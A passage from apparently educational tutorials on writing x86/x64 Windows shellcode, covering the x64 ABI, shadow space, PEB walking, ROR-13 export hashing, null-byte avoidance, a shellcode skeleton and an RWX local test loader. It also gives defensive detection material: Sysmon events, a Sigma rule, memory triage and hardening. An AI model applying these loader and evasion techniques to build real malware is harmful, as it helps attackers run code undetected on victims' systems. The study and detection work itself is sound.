Misalignment typically manifests as STATUS_ACCESS_VIOLATION on an aligned SSE move (movaps / movdqa) inside kernel32 or ntdll, a tell-tale crash signature when reviewing payloads.

10. Extraction and Controlled Testing

Once assembled with NASM, raw bytes are extracted from the COFF object and audited:

nasm -f win64 payload.asm -o payload.obj
objcopy -O binary -j .text payload.obj payload.bin

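A quick Python harness sanity-checks the extracted blob: it reports the size, flags embedded NUL bytes, and dumps a C array. It does not detect relocations; check those separately by listing the object file’s relocation entries (objdump -r payload.obj), which should be empty for position-independent code.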

# verify.py — sanity-check a raw shellcode blob
data = open("payload.bin", "rb").read()
print(f"[+] size: {len(data)} bytes")

null_offsets = [i for i, b in enumerate(data) if b == 0]
if null_offsets:
    print(f"[!] {len(null_offsets)} NUL byte(s), first at offset {null_offsets[0]:#x}")
else:
    print("[+] null-free")

# C-array dump for embedding in a test loader
print("unsigned char sc[] = {")
print(", ".join(f"0x{b:02x}" for b in data))
print("};")

A minimal local loader executes the payload inside the same process for isolated VM testing — this is the educational sandbox, not a cross-process injector:

// test_runner.cpp — local-only execution for analysis in a VM
// Defenders: this RWX + function-pointer-cast pattern is exactly what
// EDR/ETW THREATINT flags. It is shown so you know what to look for.
#include <windows.h>
#include <string.h>
extern unsigned char sc[];
extern size_t        sc_len;

int main(void) {
    void *mem = VirtualAlloc(NULL, sc_len,
                             MEM_COMMIT | MEM_RESERVE,
                             PAGE_EXECUTE_READWRITE);
    if (mem == NULL) return 1;          // allocation failed; nothing to run
    memcpy(mem, sc, sc_len);
    ((void(*)())mem)();
    return 0;
}

The VirtualAlloc(PAGE_EXECUTE_READWRITE) → memcpy → indirect-call triad is the canonical shellcode runner pattern and is heavily instrumented.

11. Common Attacker Techniques

Technique	Description
PEB walking	Resolve `kernel32`/`ntdll` bases via `GS:[0x60]` / `FS:[0x30]` without imports
Export hash resolution	ROR-13 (or FNV/djb2) hashing to find APIs without embedded strings
Stack strings	Push immediates to materialise `"cmd.exe"`, `"WinExec"`, etc., on the stack
Reflective loading	PIC stub maps a full DLL into memory and calls its `DllMain` (T1620)
Remote injection	`VirtualAllocEx` + `WriteProcessMemory` + `CreateRemoteThread` into a target PID
APC queuing	`QueueUserAPC` to deliver shellcode into an alertable thread
Process hollowing	Suspend a benign process, unmap its image, write PIC payload, resume
Module stomping	Overwrite the `.text` of a legitimately loaded DLL with PIC shellcode

12. Defensive Strategies & Detection

PIC shellcode leaves consistent telemetry across Sysmon, ETW, and memory forensics.

Sysmon Event IDs to monitor:

Event ID	Signal
`1`	Process creation (with command line) — anomalous parents (`winword.exe` → `cmd.exe`)
`7`	`ImageLoad` from user-writable paths into system processes
`8`	`CreateRemoteThread` — primary remote-injection signal
`10`	`ProcessAccess` with `GrantedAccess` containing `0x1F0FFF`, `0x1410`, or the bits `PROCESS_VM_WRITE | PROCESS_VM_OPERATION | PROCESS_CREATE_THREAD` (`0x2A`)
`17`/`18`	Named pipe creation/connection (common C2 channel)
`25`	`ProcessTampering` (image hollowing)

ETW providers give earlier and harder-to-evade signal: Microsoft-Windows-Threat-Intelligence (THREATINT) fires on VirtualAllocEx with PAGE_EXECUTE_READWRITE, WriteProcessMemory, and MapViewOfFile against remote processes. Consuming THREATINT requires a service running as an anti-malware Protected Process Light (PPL), and that status depends on a vendor ELAM driver signed through Microsoft; this is why EDR vendors, not generic SIEMs, own this telemetry. Also enable the Audit Process Creation policy (Event ID 4688) with command-line inclusion, and Audit Kernel Object to capture OpenProcess handle requests.

Sigma sketch — cross-process handle access for injection:

title: Suspicious Cross-Process Access Likely Preceding Shellcode Injection
logsource:
  product: windows
  service: sysmon
detection:
  selection:
    EventID: 10
    GrantedAccess|contains:
      - '0x1F0FFF'    # PROCESS_ALL_ACCESS (pre-Vista value; Vista and later use 0x1FFFFF)
      - '0x1410'      # QUERY_LIMITED_INFORMATION|QUERY_INFORMATION|VM_READ
      - '0x1F1FFF'
    TargetImage|endswith:
      - '\lsass.exe'
      - '\svchost.exe'
      - '\explorer.exe'
  filter_legit:
    SourceImage|endswith:
      - '\MsMpEng.exe'
      - '\MsSense.exe'
  condition: selection and not filter_legit
level: high
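Before deploying a rule like this, it can be useful to replay its logic against a few exported events. The sketch below mirrors the selection and filter in plain Python; it is not a Sigma engine, it assumes case-insensitive matching, and the sample events and the tool.exe path are invented.

```python
ACCESS_MASKS = ("0x1f0fff", "0x1410", "0x1f1fff")
TARGETS = ("\\lsass.exe", "\\svchost.exe", "\\explorer.exe")
TRUSTED_SOURCES = ("\\msmpeng.exe", "\\mssense.exe")


def rule_matches(event: dict) -> bool:
    """Evaluate 'selection and not filter_legit' for one Sysmon-style event."""
    access = event.get("GrantedAccess", "").lower()
    target = event.get("TargetImage", "").lower()
    source = event.get("SourceImage", "").lower()
    selection = (
        event.get("EventID") == 10
        and any(mask in access for mask in ACCESS_MASKS)   # |contains
        and target.endswith(TARGETS)                       # |endswith
    )
    filter_legit = source.endswith(TRUSTED_SOURCES)
    return selection and not filter_legit


suspicious = {"EventID": 10, "GrantedAccess": "0x1410",
              "TargetImage": r"C:\Windows\System32\lsass.exe",
              "SourceImage": r"C:\Users\Public\tool.exe"}
defender = dict(suspicious,
                SourceImage=r"C:\Program Files\Windows Defender\MsMpEng.exe")
benign = dict(suspicious, GrantedAccess="0x1000")

for ev in (suspicious, defender, benign):
    print(ev["SourceImage"], ev["GrantedAccess"], rule_matches(ev))
```

A filter keyed only on the image file name is easy to satisfy by naming a binary MsMpEng.exe, so in production it is worth filtering on the full path or signer where the log source provides one.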

Memory-forensics indicators: Volatility 3 malfind locates RWX regions containing executable code or PE headers in non-image memory; ldrmodules flags executable regions not represented in any of the three PEB loader lists — the canonical reflective/PIC signature. Threads whose StartAddress falls inside a heap allocation rather than a mapped image are inherently suspicious.
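The same indicators can be expressed as a small triage filter over region records. The sketch below uses the page-protection and memory-type constants from the Windows headers; the record format (dicts with base, protect, and type keys) is an assumption standing in for whatever a VirtualQueryEx wrapper or forensics plugin emits, and the sample regions are invented.

```python
PAGE_EXECUTE = 0x10
PAGE_EXECUTE_READ = 0x20
PAGE_EXECUTE_READWRITE = 0x40
PAGE_EXECUTE_WRITECOPY = 0x80
MEM_PRIVATE = 0x20000
MEM_IMAGE = 0x1000000

EXECUTABLE = (PAGE_EXECUTE | PAGE_EXECUTE_READ |
              PAGE_EXECUTE_READWRITE | PAGE_EXECUTE_WRITECOPY)


def triage(regions):
    """Return (base, reason) pairs for regions worth a closer look."""
    findings = []
    for r in regions:
        if not r["protect"] & EXECUTABLE:
            continue                                  # not executable: ignore
        if r["protect"] & PAGE_EXECUTE_READWRITE:
            findings.append((r["base"], "writable and executable"))
        elif r["type"] == MEM_PRIVATE:
            findings.append((r["base"], "executable private memory"))
    return findings


sample = [
    {"base": 0x7FF800000000, "protect": PAGE_EXECUTE_READ, "type": MEM_IMAGE},
    {"base": 0x1F0000, "protect": PAGE_EXECUTE_READWRITE, "type": MEM_PRIVATE},
    {"base": 0x2A0000, "protect": PAGE_EXECUTE_READ, "type": MEM_PRIVATE},
    {"base": 0x300000, "protect": 0x04, "type": MEM_PRIVATE},
]
for base, reason in triage(sample):
    print(hex(base), reason)
```

JIT engines such as browsers and managed runtimes legitimately create executable private memory, so results from a filter like this are leads to correlate with other telemetry, not verdicts.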

Hardening:

Mitigation	Effect
ACG (`ProcessDynamicCodePolicy`)	Forbids new executable pages; breaks `VirtualAlloc(PAGE_EXECUTE_READWRITE)`
DEP / NX	Hardware-enforced non-execute on data pages
CFG	Invalidates indirect calls to non-registered targets
HVCI	Hypervisor-enforced kernel code integrity
ASR rules	Block office/script children, untrusted USB execution, etc.
Restrict `SeDebugPrivilege`	Limits which accounts can open and write to other processes

Figure: four defensive detection layers against PIC shellcode (ETW THREATINT telemetry, Sysmon event IDs, Volatility memory forensics, and OS hardening mitigations). Layered detection combines kernel-level ETW telemetry, Sysmon behavioral events, and offline memory analysis to catch shellcode across its full lifecycle.

13. Tools for PIC Shellcode Analysis

Tool	Description	Link
WinDbg	Verify struct offsets (`dt ntdll!_PEB`, `dt ntdll!_LDR_DATA_TABLE_ENTRY`)	microsoft.com
NASM	Assemble x86/x64 PIC payloads in Intel syntax	nasm.us
x64dbg	Dynamic analysis of shellcode in a loader harness	x64dbg.com
Ghidra / IDA	Static disassembly of extracted opcodes	ghidra-sre.org
Process Hacker	Inspect process memory regions and protections	processhacker.sf.io
`pe-sieve`	Hunts injected, hollowed, or stomped modules	github.com/hasherezade/pe-sieve
Volatility 3	`malfind`, `ldrmodules`, `vadinfo` for memory-resident PIC	volatilityfoundation.org
YARA	Signature ROR-13 loops, PEB-walk prologues, hash tables	virustotal.github.io/yara
SilkETW	Subscribe to THREATINT and Kernel-Process providers	github.com/mandiant/SilkETW

14. MITRE ATT&CK Mapping

Technique	MITRE ID	Detection
Reflective Code Loading	`T1620`	Volatility `malfind` / `ldrmodules`; THREATINT ETW
Process Injection (parent)	`T1055`	Sysmon EID `10` + EID `8`; ETW THREATINT WriteVM/AllocVM
Process Injection: DLL	`T1055.001`	Sysmon EID `7` from unusual paths; `pe-sieve`
Process Injection: APC	`T1055.004`	Kernel-Process ETW thread events on alertable waits
Process Injection: Hollowing	`T1055.012`	Sysmon EID `25` ProcessTampering; `pe-sieve` hollowing scan
Obfuscated Files or Information	`T1027`	YARA on ROR-13 hash loops and stack-string push sequences
Command and Scripting Interpreter	`T1059`	EID `4688` / Sysmon EID `1` with command-line auditing

Summary

Position-independent shellcode replaces the PE loader’s work at runtime: it must resolve every address it touches, starting from the segment-register pointer to the TEB.
The PEB → Ldr → InMemoryOrderModuleList chain reaches kernel32.dll’s base in a handful of pointer loads (six in the x64 listing) without any string comparison.
Parsing the PE export directory with ROR-13 hashed lookups removes embedded API name strings and the static signatures they create.
Stack-string construction, XOR-zero idioms, and RIP-relative addressing keep the byte stream null-free and relocation-free.
Defenders catch the resulting behaviour through Sysmon EID 8/10, THREATINT ETW on VirtualAllocEx/WriteProcessMemory, and Volatility malfind/ldrmodules against unbacked RWX regions — and harden processes with ACG, CFG, HVCI, and ASR rules to break the primitive entirely.

Writing x64 Shellcode: Differences, Shadow Space, and Register Conventions

Objective: Understand the architectural and ABI-level differences between x86 and x64 Windows shellcode, including the Microsoft x64 calling convention, shadow space, stack alignment, position-independent API resolution via PEB walking, and the detection surface each technique exposes.

1. From x86 to x64: What Actually Changed

Moving shellcode from x86 to x64 Windows is not a syntactic exercise of renaming EAX to RAX. The ABI changed, the segment register that anchors the TEB changed, and the addressing model changed. A snippet that “looks right” can execute cleanly, corrupt the host process, and crash three calls later inside an SSE instruction — none of which gives the author an obvious clue.

Item	x86	x64
General-purpose registers	8 × 32-bit (`EAX`…`EDI`)	16 × 64-bit (`RAX`…`R15`)
Windows calling convention	`stdcall` / `cdecl` — all args on stack	Unified fast-call — first 4 integer args in registers
TEB segment register	`FS`; PEB at `fs:[0x30]`	`GS`; PEB at `gs:[0x60]`
Address width	32-bit	64-bit (48-bit canonical VA in practice)
`call` pushes	4-byte return address	8-byte return address
RIP-relative addressing	Not available	Available; `lea rax, [rip + offset]` is idiomatic in PIC

Two consequences dominate the rest of this tutorial. First, x64 adopts a single __fastcall-style ABI with a mandatory shadow space and 16-byte stack alignment rule. Second, the TEB is reached via GS, not FS, and every PEB offset must be updated for the 64-bit struct layout.

2. The Microsoft x64 ABI Deep-Dive

The Microsoft x64 calling convention passes the first four integer arguments in registers and floating-point arguments in the low halves of the first four XMM registers. Anything beyond that goes on the stack, above the shadow space, pushed right-to-left.

Argument #	Integer Register	Floating-Point Register
1st	`RCX`	`XMM0L`
2nd	`RDX`	`XMM1L`
3rd	`R8`	`XMM2L`
4th	`R9`	`XMM3L`
5th+	Stack (above shadow space)	Stack

The return value lives in RAX for integers and pointers, and in XMM0 for floating-point results.

Volatile vs Non-Volatile Registers

Class	Registers
Volatile	`RAX`, `RCX`, `RDX`, `R8`, `R9`, `R10`, `R11`, `XMM0`–`XMM5`
Non-volatile	`RBX`, `RBP`, `RDI`, `RSI`, `RSP`, `R12`, `R13`, `R14`, `R15`, `XMM6`–`XMM15`

A callee may freely destroy volatile registers; non-volatile registers must be preserved across calls. Shellcode that clobbers RBX or RDI in the host thread and then returns control corrupts the host. This is the single most common reason “working” shellcode crashes the host process several instructions after the shellcode finishes.

Side-by-Side: x86 Push vs x64 Register Load

; --- x86 stdcall: MessageBoxA(0, "msg", "title", 0) ---
push 0              ; uType
push title          ; lpCaption
push msg            ; lpText
push 0              ; hWnd
call [MessageBoxA]  ; callee cleans the stack

; --- x64 fastcall: same call ---
xor  rcx, rcx                       ; hWnd      = NULL
lea  rdx, [rel msg]                 ; lpText
lea  r8,  [rel title]               ; lpCaption
xor  r9d, r9d                       ; uType     = 0
sub  rsp, 0x28                      ; shadow space + alignment (see §4)
call [rel MessageBoxA]
add  rsp, 0x28

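Note xor r9d, r9d rather than xor r9, r9: writing to the 32-bit sub-register zero-extends to the full 64-bit register. For R8–R15 both forms need a REX prefix and are three bytes long, but for the legacy registers the 32-bit form is a byte shorter (xor ecx, ecx is 31 C9; xor rcx, rcx is 48 31 C9). Either way the encoding is null-free.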

Figure: the Microsoft x64 calling convention. The first four integer arguments travel in RCX, RDX, R8, and R9; additional arguments land on the stack above the shadow space; the return value comes back in RAX.

3. Shadow Space: Why, What, and Where

In the Microsoft x64 convention the caller must reserve 32 bytes (4 × 8) of stack immediately above the return address as shadow space (also called home space or spill space). This area exists so the callee has somewhere to spill RCX, RDX, R8, and R9 back to memory if it needs to take their addresses or free up the registers for re-use.

Critical points:

Shadow space is always reserved, even when the callee takes fewer than four arguments and even when the callee never spills.
It is owned by the caller. The callee may overwrite it without saving the previous contents.
The caller does not zero or initialise it. The callee is responsible for whatever it writes there.
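Stack arguments beyond the fourth begin at [RSP + 0x28] as seen by the callee on entry (32 bytes shadow + 8 bytes return address); from the caller’s side, just before the call, the same slot is [RSP + 0x20].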

Layout immediately after `call`, before callee prologue	Offset from `RSP`
Return address (pushed by `call`)	`[RSP + 0x00]`
Shadow slot for `RCX`	`[RSP + 0x08]`
Shadow slot for `RDX`	`[RSP + 0x10]`
Shadow slot for `R8`	`[RSP + 0x18]`
Shadow slot for `R9`	`[RSP + 0x20]`
5th argument (if any)	`[RSP + 0x28]`
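The table follows a single formula, which the short sketch below spells out. The function names are illustrative; argument numbers are 1-based and every slot is 8 bytes.

```python
RET_ADDR_BYTES = 8
SLOT_BYTES = 8


def callee_slot_offset(n: int) -> int:
    """Offset from RSP at callee entry to the home/stack slot of argument n."""
    if n < 1:
        raise ValueError("argument numbers start at 1")
    return RET_ADDR_BYTES + SLOT_BYTES * (n - 1)


def caller_slot_offset(n: int) -> int:
    """Offset from RSP in the caller, immediately before the call instruction."""
    return callee_slot_offset(n) - RET_ADDR_BYTES


for n in range(1, 7):
    kind = "shadow" if n <= 4 else "stack "
    print(f"arg {n} ({kind}): callee [rsp+{callee_slot_offset(n):#04x}]  "
          f"caller [rsp+{caller_slot_offset(n):#04x}]")
```

Seen this way, the shadow space is simply the stack slots for arguments 1 to 4 that the caller reserves but does not fill. The fifth argument lands at 0x28 for the callee and 0x20 for the caller because the only difference between the two views is the pushed return address.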

Skip the shadow allocation and the first thing the callee does, often a mov [rsp+8], rcx early in a Win32 prologue, overwrites whatever sits directly above the return address: your own locals, a stack string, or an outer frame’s saved return address.

Figure: stack layout under the Microsoft x64 calling convention. The caller always reserves 32 bytes of shadow space directly above the return address; additional stack arguments start at RSP+0x28 as seen by the callee.

4. Stack Alignment in Practice

The Microsoft x64 ABI requires RSP to be 16-byte aligned at the moment of a call, except inside a prolog. The hardware call then pushes an 8-byte return address, so on entry to the callee RSP is 16N + 8 aligned. Win32 internals (memcpy, CRT, anything that uses SSE/AVX with aligned moves) will issue movaps / movdqa against stack locations and will raise EXCEPTION_ACCESS_VIOLATION (0xC0000005) if RSP is wrong by 8.

This is why the canonical shellcode prologue is sub rsp, 0x28, not 0x20:

0x20 (32 bytes) for shadow space.
+ 0x08 to undo the misalignment the preceding call introduced.

; Canonical shellcode call wrapper
sub rsp, 0x28          ; 32B shadow + 8B realign
call rax               ; rax = resolved API address
add rsp, 0x28

When the shellcode entry itself was reached by a jump from unknown context, force alignment explicitly:

; Defensive entry: align RSP regardless of caller state
and rsp, 0xFFFFFFFFFFFFFFF0   ; force 16-byte alignment
sub rsp, 0x20                  ; shadow space only; RSP is already aligned, so no extra 8

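To diagnose alignment faults in WinDbg, dump the faulting instruction (u .) and check whether it is a movaps / movdqa referencing [rsp+…]. If rsp & 0xF == 0x8 at the call, the stack adjustment is off by 8: either the + 0x08 is missing after a call-style entry, or it was added on top of an RSP that was already aligned.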
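The alignment rule is plain modular arithmetic, and it can be checked on paper or with a few lines of code. The sketch below tracks RSP through a list of stack adjustments; the operation names and the starting address are arbitrary choices for illustration.

```python
ALIGN_MASK = 0xFFFFFFFFFFFFFFF0


def rsp_at_call(entry_rsp: int, ops) -> int:
    """Apply (operation, value) pairs to RSP and return its value at the call."""
    rsp = entry_rsp
    for op, val in ops:
        if op == "sub":
            rsp -= val
        elif op == "add":
            rsp += val
        elif op == "and":
            rsp &= val
        else:
            raise ValueError(f"unknown op {op!r}")
    return rsp


def aligned(rsp: int) -> bool:
    return rsp % 16 == 0


entered_by_call = 0x1000 - 8          # caller was aligned, call pushed 8 bytes

cases = {
    "call entry, sub 0x28":    [("sub", 0x28)],
    "call entry, sub 0x20":    [("sub", 0x20)],
    "forced align, sub 0x20":  [("and", ALIGN_MASK), ("sub", 0x20)],
    "forced align, sub 0x28":  [("and", ALIGN_MASK), ("sub", 0x28)],
}
for label, ops in cases.items():
    rsp = rsp_at_call(entered_by_call, ops)
    print(f"{label:<24} rsp & 0xF = {rsp & 0xF:#x}  aligned={aligned(rsp)}")
```

The pattern to remember: 0x28 compensates for the 8 bytes pushed by a preceding call, while an explicit AND already leaves RSP aligned and therefore pairs with a multiple of 16.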

5. Position-Independent Code Fundamentals

Shellcode does not know where it will land. Hard-coded addresses are forbidden — ASLR randomises module bases per boot, and the shellcode itself is dropped at an allocator-chosen address. Two x64 idioms enable position independence:

RIP-relative addressing. lea rax, [rel label] resolves to lea rax, [rip + disp32] and produces correct results regardless of load address. This is the preferred way to reference embedded data in x64 shellcode.
call/pop delta trick. A call to the next instruction pushes its return address — the runtime location of the following label. The callee pops it into a register to obtain a base for subsequent offsets.

; Obtain the runtime address of `data` without RIP-relative encoding
    call get_rip
get_rip:
    pop rbx                  ; rbx = runtime address of get_rip (the pushed return address)
    lea rsi, [rbx + data - get_rip]
    jmp continue
data:
    db "kernel32.dll", 0
continue:

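In practice, prefer lea reg, [rel label] for clarity; reach for call/pop only when an encoder or decoder stub needs its own address in a register. Note that a call to the immediately following instruction encodes as E8 00 00 00 00, so where nulls are bad characters the usual variant jumps forward and calls backward (jmp/call/pop), which produces a negative displacement with no zero bytes.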
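To see why the direction of the call matters for bad bytes, it helps to look at how the rel32 displacement is encoded. This is a small sketch using only the standard library; the helper name and the backward distance of 0x15 bytes are arbitrary choices for illustration.

```python
import struct

def call_rel32(disp: int) -> bytes:
    """Encode `call rel32` (opcode E8) with a signed 32-bit displacement."""
    return b"\xE8" + struct.pack("<i", disp)

forward = call_rel32(0)        # call to the very next instruction
backward = call_rel32(-0x15)   # call to a label 0x15 bytes earlier (hypothetical)

print(forward.hex(" "))        # e8 00 00 00 00
print(backward.hex(" "))       # e8 eb ff ff ff
print(0 in forward, 0 in backward)
```

Small forward displacements fill the upper bytes with 0x00, small backward ones with 0xFF, which is the whole reason the jmp/call/pop ordering exists.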

6. PEB Walking: Finding kernel32.dll Without Imports

Because shellcode has no import table, it must walk the loader’s in-memory bookkeeping to find kernel32.dll and then resolve GetProcAddress / LoadLibraryA from its exports. On x64 Windows the chain starts at GS and uses these offsets:

Step	Source	Field	Offset (x64)
1	`GS` segment	→ `TEB`	—
2	`TEB`	`ProcessEnvironmentBlock`	`+0x060`
3	`PEB`	`Ldr` → `PEB_LDR_DATA`	`+0x018`
4	`PEB_LDR_DATA`	`InMemoryOrderModuleList`	`+0x020`
5	`LDR_DATA_TABLE_ENTRY` link	`InMemoryOrderLinks.Flink`	`+0x000`
6	`LDR_DATA_TABLE_ENTRY`	`DllBase` (from `InMemoryOrderLinks`)	`+0x020`

The InMemoryOrderModuleList on a normal process begins with the executable, then ntdll.dll, then kernel32.dll. The list head's Flink points at the first entry, so two further Flink dereferences reach the kernel32.dll entry. DllBase sits at +0x30 from the start of LDR_DATA_TABLE_ENTRY, but the list pointer lands on InMemoryOrderLinks at +0x10, hence the +0x20 displacement. Production-grade shellcode hashes the BaseDllName string rather than trusting that order, both for resilience and because some EDRs deliberately permute the head of the list as a tripwire (see §11).

; --- PEB walk skeleton: locate kernel32.dll base in rax ---
    mov   rbx, [gs:0x60]        ; TEB -> PEB
    mov   rbx, [rbx + 0x18]     ; PEB -> Ldr (PEB_LDR_DATA)
    mov   rbx, [rbx + 0x20]     ; -> InMemoryOrderModuleList.Flink
                                ;    (points into 1st LDR_DATA_TABLE_ENTRY's InMemoryOrderLinks)
    mov   rbx, [rbx]            ; advance: -> 2nd entry (ntdll)
    mov   rbx, [rbx]            ; advance: -> 3rd entry (kernel32)
    mov   rax, [rbx + 0x20]     ; DllBase: entry+0x30, minus 0x10 for InMemoryOrderLinks
                                ; rax now holds kernel32.dll base address

To verify the offsets against the target OS build, drop into WinDbg on a live process and dump the structures directly:

0:000> dt nt!_TEB ProcessEnvironmentBlock
0:000> dt nt!_PEB Ldr
0:000> dt nt!_PEB_LDR_DATA InMemoryOrderModuleList
0:000> dt nt!_LDR_DATA_TABLE_ENTRY DllBase BaseDllName
0:000> !lmi kernel32
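If no debugger is at hand, the DllBase displacement can be sanity-checked from the documented start of LDR_DATA_TABLE_ENTRY: three LIST_ENTRY fields followed by DllBase. The sketch below assumes exactly that leading layout and nothing about later fields; the function name is mine.

```python
def ldr_entry_offsets(ptr_size: int) -> dict:
    """Offsets of the leading LDR_DATA_TABLE_ENTRY fields for a pointer size."""
    list_entry = 2 * ptr_size                 # LIST_ENTRY = Flink + Blink
    in_load_order = 0
    in_memory_order = in_load_order + list_entry
    in_init_order = in_memory_order + list_entry
    dll_base = in_init_order + list_entry
    return {
        "InMemoryOrderLinks": in_memory_order,
        "DllBase": dll_base,
        # What a walker adds to a pointer obtained from InMemoryOrderModuleList:
        "DllBase_from_InMemoryOrderLinks": dll_base - in_memory_order,
    }

for name, size in (("x64", 8), ("x86", 4)):
    offs = ldr_entry_offsets(size)
    print(name, {k: hex(v) for k, v in offs.items()})
```

The displacement comes out as 0x20 for 64-bit processes and 0x10 for 32-bit ones; treat the dt output on the target build as the final authority.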

Figure: PEB walk from the GS segment through PEB_LDR_DATA and InMemoryOrderModuleList to the kernel32.dll base address. Starting from the PEB pointer at GS:[0x60], shellcode follows the list head and then two further Flink pointers to reach kernel32.dll.

7. Parsing the Export Address Table

With kernel32.dll’s base in hand, the shellcode walks the PE headers to the Export Directory and then iterates AddressOfNames, comparing each name against a precomputed hash. String literals like "GetProcAddress" are avoided to defeat trivial string signatures and to keep the lookup compact.

Key offsets from a loaded module base:

Field	Offset
`e_lfanew` (offset of PE header)	`DllBase + 0x3C`
Optional Header	`PE_header + 0x18`
Export Directory RVA (PE32+)	`OptHeader + 0x70`
`AddressOfFunctions`	`ExportDir + 0x1C`
`AddressOfNames`	`ExportDir + 0x20`
`AddressOfNameOrdinals`	`ExportDir + 0x24`

; --- EAT walk outline: resolve an export by ROR-13 name hash ---
; in : rax = module base, ebp = target hash (e.g. for "GetProcAddress")
; out: rax = exported function address (or 0)

    mov   ecx, [rax + 0x3C]      ; e_lfanew
    add   rcx, rax               ; rcx = PE header
    mov   edx, [rcx + 0x88]      ; Export Directory RVA (OptHdr + 0x70)
    add   rdx, rax               ; rdx = IMAGE_EXPORT_DIRECTORY
    mov   r8d,  [rdx + 0x18]     ; NumberOfNames
    mov   r9d,  [rdx + 0x20]     ; AddressOfNames RVA
    add   r9, rax
    xor   r10, r10               ; index

.next_name:
    mov   esi, [r9 + r10*4]      ; name RVA
    add   rsi, rax               ; rsi -> ASCII export name
    xor   edi, edi               ; hash accumulator

.hash_byte:
    movzx r11d, byte [rsi]       ; scratch register: rax must keep the module base
    test  r11b, r11b
    jz    .check
    ror   edi, 13
    add   edi, r11d
    inc   rsi
    jmp   .hash_byte

.check:
    cmp   edi, ebp               ; compare ROR-13 hash
    je    .found
    inc   r10
    cmp   r10d, r8d
    jb    .next_name
    xor   rax, rax               ; not found
    ret
.found:
    ; resolve via AddressOfNameOrdinals + AddressOfFunctions
    ; (omitted for brevity)
    ret

The ROR-13 rotate-and-add hash, popularised by the Metasploit block_api stub, is the de facto standard, which is precisely why defenders now key on it (see §11).
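For analysts, the practical use of this hash is the reverse direction: precompute it over a module's export names and look up the 32-bit constants found in a sample. The sketch below mirrors the loop in the listing above (rotate right by 13, add the byte, stop before the terminator). Variants that fold in the module name or the terminating null produce different values, so treat it as one member of the family rather than a universal decoder.

```python
def ror32(value: int, count: int) -> int:
    """Rotate a 32-bit value right by `count` bits."""
    count %= 32
    return ((value >> count) | (value << (32 - count))) & 0xFFFFFFFF

def ror13_hash(name: str) -> int:
    """Rotate-and-add hash over the ASCII bytes of `name`, terminator excluded."""
    h = 0
    for byte in name.encode("ascii"):
        h = (ror32(h, 13) + byte) & 0xFFFFFFFF
    return h

# Build a reverse lookup table from whatever export names you care about.
exports = ["GetProcAddress", "LoadLibraryA", "VirtualAlloc", "ExitProcess"]
table = {ror13_hash(n): n for n in exports}
for value, name in table.items():
    print(f"0x{value:08X}  {name}")
```

Feeding the full export list of kernel32.dll and ntdll.dll into the same table turns opaque immediates in a disassembly back into API names.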

8. Null-Byte and Bad-Character Avoidance

Shellcode delivered through a string-copy primitive (strcpy, lstrcatA, format-string echo) is truncated at the first null byte. x64 immediates routinely embed nulls because most useful constants and addresses do not occupy all 64 bits.

Problem	Fix
`mov rax, 0x000000007FFE1234` (imm64 form) → nulls	`mov eax, 0x7FFE1234` (32-bit write zero-extends into `RAX`)
64-bit literal in `mov r9, imm64`	`lea r9, [rel label]` or build via shifts/ORs
`push 0` → encodes `6A 00`	`xor ecx, ecx` ; `push rcx`
`mov rcx, 0` → 7-byte encoding with four nulls	`xor ecx, ecx`

; --- Null-byte comparison ---
; BAD: 64-bit immediate form (in NASM: mov rax, strict qword 0x76ab1234;
;      some assemblers shorten the plain form automatically)
;   48 B8 34 12 AB 76 00 00 00 00   <-- four null bytes
;
; GOOD: write the 32-bit sub-register; the CPU zero-extends into rax
;   B8 34 12 AB 76                   <-- mov eax, 0x76AB1234
mov eax, 0x76ab1234

Writing to EAX implicitly zeroes the upper 32 bits of RAX — this single architectural quirk eliminates most accidental nulls in shellcode constants.

A short Python lab to validate a candidate snippet:

from keystone import Ks, KS_ARCH_X86, KS_MODE_64

asm = b"""
    xor eax, eax
    mov eax, 0x76ab1234
    mov rbx, qword ptr gs:[0x60]
    mov rbx, qword ptr [rbx + 0x18]
"""
ks = Ks(KS_ARCH_X86, KS_MODE_64)
code, _ = ks.asm(asm)
buf = bytes(code)
print(buf.hex())
bad = [i for i, b in enumerate(buf) if b == 0x00]
print(f"length={len(buf)} bad_byte_offsets={bad}")

Run it, see exactly where nulls (or any other bad character) land, and rewrite the offending instruction.

9. Shellcode Skeleton: Putting It Together

The pieces combine into a recognisable x64 stub: align the stack, walk the PEB to find kernel32.dll, parse the EAT to resolve GetProcAddress and LoadLibraryA, and then call out through the standard ABI with proper shadow space.

[BITS 64]
_start:
    ; --- entry: save caller RSP, then defensively align the stack ---
    push  rbp
    mov   rbp, rsp                 ; rbp = RSP to restore before ret
    and   rsp, 0xFFFFFFFFFFFFFFF0
    sub   rsp, 0x20                ; shadow space; RSP stays 16-byte aligned

    ; --- locate kernel32.dll via PEB ---
    mov   rbx, [gs:0x60]           ; TEB -> PEB
    mov   rbx, [rbx + 0x18]        ; PEB -> Ldr
    mov   rbx, [rbx + 0x20]        ; InMemoryOrderModuleList.Flink (executable)
    mov   rbx, [rbx]               ; -> ntdll entry
    mov   rbx, [rbx]               ; -> kernel32 entry
    mov   r15, [rbx + 0x20]        ; r15 = kernel32 base (DllBase via InMemoryOrderLinks)

    ; --- resolve GetProcAddress via ROR-13 hash (call into eat_lookup) ---
    mov   rcx, r15
    mov   edx, 0x7C0DFCAA          ; ROR-13("GetProcAddress")  (illustrative)
    call  eat_lookup               ; rax = &GetProcAddress
    mov   r14, rax

    ; --- call LoadLibraryA("user32.dll") via GetProcAddress ---
    mov   rcx, r15                 ; hModule = kernel32
    lea   rdx, [rel s_LoadLibraryA]
    call  r14                      ; rax = &LoadLibraryA
    lea   rcx, [rel s_user32]
    call  rax                      ; rax = HMODULE user32

    ; --- ... continue resolution and API calls ...

    ; --- exit: restore the caller's stack ---
    mov   rsp, rbp
    pop   rbp
    ret

s_LoadLibraryA: db "LoadLibraryA", 0
s_user32:       db "user32.dll", 0

; eat_lookup: in rcx=module base, edx=ROR13 hash -> rax = export addr
eat_lookup:
    ; (see §7 for the inner loop; adapt its registers to this interface)
    ret

Every block in the skeleton corresponds to one of the rules established above: an aligned stack with 32 bytes of shadow space before any call, gs:[0x60] for the PEB, the DllBase read relative to InMemoryOrderLinks, lea + RIP-relative strings for PIC, and r14 / r15 carrying state across API calls because callees must preserve non-volatile registers.

10. Common Attacker Techniques

Technique	Description
PEB-walk API resolution	Locate `kernel32.dll` via `gs:[0x60]` chain, parse exports by hash
ROR-13 export hashing	Avoid embedded API name strings; survive static signature scans
RIP-relative PIC	`lea reg, [rel label]` to address embedded data without fixups
Sub-register zero-extension	`mov eax, imm32` to write `RAX` with no null bytes
Shadow-space-aware call wrapping	`sub rsp, 0x28` around every Win32 call from an unknown caller
